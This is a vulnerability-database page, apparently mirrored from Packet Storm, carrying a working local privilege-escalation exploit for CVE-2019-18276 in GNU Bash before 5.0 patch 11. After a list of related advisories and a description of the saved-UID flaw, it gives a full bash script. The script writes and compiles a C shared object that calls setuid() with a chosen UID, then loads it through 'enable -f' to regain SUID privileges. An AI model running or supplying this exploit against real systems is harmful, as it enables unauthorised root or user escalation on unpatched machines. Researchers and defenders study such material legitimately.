Bash 5.0 Patch 11 Privilege Escalation

🗓️ 29 Nov 2019 00:00:00Reported by Mohin ParamasivamType

packetstorm🔗 packetstormsecurity.com👁 338 Views

Bash 5.0 Patch 11 Privilege Escalation, SUID Priv Drop Exploi

Reporter	Title	Published	Views	Family All 86
IBM Security Bulletins	Security Bulletin: Vulnerability in Bash (CVE-2019-18276) affects HMC	22 Nov 202106:16	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple Security Vulnerabilities were identified in IBM Security Verify Access.	9 Jan 202420:27	–	ibm
IBM Security Bulletins	Security Bulletin: Netcool Operations Insight v1.6.8 addresses multiple security vulnerabilities.	11 Apr 202311:47	–	ibm
IBM Security Bulletins	Security Bulletin: Cloud Pak for Security uses packages that are vulnerable to several CVEs	19 Oct 202115:38	–	ibm
IBM Security Bulletins	Security Bulletin: IBM QRadar SIEM Application Framework Base Image is vulnerable to using components with Known Vulnerabilities	3 Dec 202118:52	–	ibm
0day.today	Bash 5.0 Patch 11 - SUID Priv Drop Exploit	29 Nov 201900:00	–	zdt
CBLMariner	CVE-2019-18276 affecting package bash 4.4.23-1	30 Nov 202019:30	–	cbl_mariner
Tenable Nessus	CentOS 8 : bash (CESA-2021:1679)	19 May 202100:00	–	nessus
Tenable Nessus	EulerOS 2.0 SP8 : bash (EulerOS-SA-2020-1140)	25 Feb 202000:00	–	nessus
Tenable Nessus	EulerOS 2.0 SP5 : bash (EulerOS-SA-2020-1303)	24 Mar 202000:00	–	nessus

`# Exploit Title : Bash 5.0 Patch 11 - SUID Priv Drop Exploit  
# Date : 2019-11-29  
# Original Author: Ian Pudney , Chet Ramey  
# Exploit Author : Mohin Paramasivam (Shad0wQu35t)  
# Version : < Bash 5.0 Patch 11  
# Tested on Linux  
# Credit : Ian Pudney from Google Security and Privacy Team based on Google CTF suidbash  
# CVE : 2019-18276  
# CVE Link : https://nvd.nist.gov/vuln/detail/CVE-2019-18276 , https://www.youtube.com/watch?v=-wGtxJ8opa8  
# Exploit Demo POC : https://youtu.be/Dbwvzbb38W0  
  
Description :  
  
An issue was discovered in disable_priv_mode in shell.c in GNU Bash through 5.0 patch 11.  
By default, if Bash is run with its effective UID not equal to its real UID,  
it will drop privileges by setting its effective UID to its real UID.  
However, it does so incorrectly. On Linux and other systems that support "saved UID" functionality,  
the saved UID is not dropped. An attacker with command execution in the shell can use "enable -f" for  
runtime loading of a new builtin, which can be a shared object that calls setuid() and therefore  
regains privileges. However, binaries running with an effective UID of 0 are unaffected.  
  
#!/bin/bash  
  
  
#Terminal Color Codes  
  
RED='\033[0;31m'  
GREEN='\033[0;32m'  
NC='\033[0m'  
  
  
#Get the Effective User ID (owner of the SUID /bin/bash binary)  
read -p "Please enter effective user id (euid) : " euid  
  
#Create a C file and output the exploit code  
touch pwn.c  
echo "" > pwn.c  
  
cat <<EOT >> pwn.c  
  
#include <sys/types.h>  
#include <unistd.h>  
#include <stdio.h>  
  
void __attribute((constructor)) initLibrary(void) {  
printf("Escape lib is initialized");  
printf("[LO] uid:%d | euid:%d%c", getuid(), geteuid());   
setuid($euid);  
printf("[LO] uid%d | euid:%d%c", getuid(), geteuid());  
}  
  
EOT  
  
echo -e "${RED}"  
echo -e "Exploit Code copied to pwn.c !\n"  
sleep 5  
echo -e "Compiling Exploit Object ! \n"  
$(which gcc ) -c -fPIC pwn.c -o pwn.o  
sleep 5  
echo -e "Compiling Exploit Shared Object ! \n"  
$(which gcc ) -shared -fPIC pwn.o -o libpwn.so  
sleep 5  
echo -e "Exploit Compiled ! \n"  
sleep 5  
echo -e "Executing Exploit :) \n"  
sleep 5  
  
  
#Execute the Shared Library  
echo -e "${RED}Run : ${NC} enable -f ./libpwn.so asd \n"  
`

29 Nov 2019 00:00Current

0.6Low risk

Vulners AI Score0.6

EPSS0.50225